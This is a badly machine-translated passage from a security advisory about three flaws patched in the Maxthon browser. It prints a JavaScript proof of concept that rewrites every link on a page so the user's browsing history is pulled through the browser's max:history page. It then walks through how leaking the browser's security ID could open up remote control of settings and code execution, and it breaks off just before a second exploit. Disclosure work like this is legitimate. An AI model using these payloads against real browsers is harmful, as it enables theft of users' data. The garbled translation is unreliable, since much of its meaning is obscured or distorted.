After the 80sec notice roams through the existence the security crack, roamed through had issued in 6.30 the update browser, has repaired the security crack which front mentioned, the concrete renewal might see http://blog.maxthon.cn/, this renewal has repaired three security problems, the main question detail was as follows:

Crack origin: http://www.80sec.com/release/maxthon-vulns-poc.txt

1 browser essence crack causes this locality cross territory crack

Crack explanation: maxthon has used system's IE essence, but this essence possibly has some security crack to cause the cross territory attack, but roams through max: And so on territory is in local equates in file://, therefore this cross territory attack will cause in the local context to carry out the javascript code, here only gives obtains roams through the browsing historic record POC.

Crack POC:

<a href= "" >Maxthon Exploit</a>
<script>
function win() {
x=window.open (“max:history”);
setTimeout (function() {
x.location=new String (“javascript:x=maxHistory.history.list.site.loadData(); for (i=0; i<x.length; i++) document.write(x[i] .site+ \” <br> \”); ”)
}, 3000)
}
window.onload=function() {
for (i=0; i<document.links.length; i++) {
document.links[i].href=” javascript:win()”
}
}
</script>

Crack repair: Before IE essence repair, roamed through the new edition already to repair this security crack

2 roam through the long-distance revision random user establishment which the security center crack causes

Crack explanation: Roams through is not understood to IE essence some characteristics that causes when processes some peculiar circumstances to present the security crack. Roams through the control center in fact is group of HTML+JAVASCRIPT, may read the sensitive data through these pages, revises the browser establishment, downloading document and so on. Certainly, roams through also has own security policy, puts these HTML document to the exterior stand in cannot transfer directly, because roams through has a safety control strategy, security.src, this document code is as follows:

var max_security_id= ''; var url=String (document.location) .toLowerCase(); if (url.indexOf ('file://') >-1&&url.indexOf ('http://')==-1&&url.indexOf('https://')==-1) {max_security_id=' {B73B3AC9-B009-4429-AE67-514332D791FE}'; } else {document.location='about:blank';}

And max_security_id is roams through when transfers each kind controls must a parameter, this parameter in each function is must, each machine's max_security_id is not same. If we can obtain this max_security_id that to be possible each kind of function for example establishment which roams through in the long-distance random stand transfer, the read sensitive data even was the long-distance code carries out.

First, this max_security_id each time starts apparents can change, this max_security_id will save in installs the table of contents in template/security.src, but we may make the following transfer in our stand page: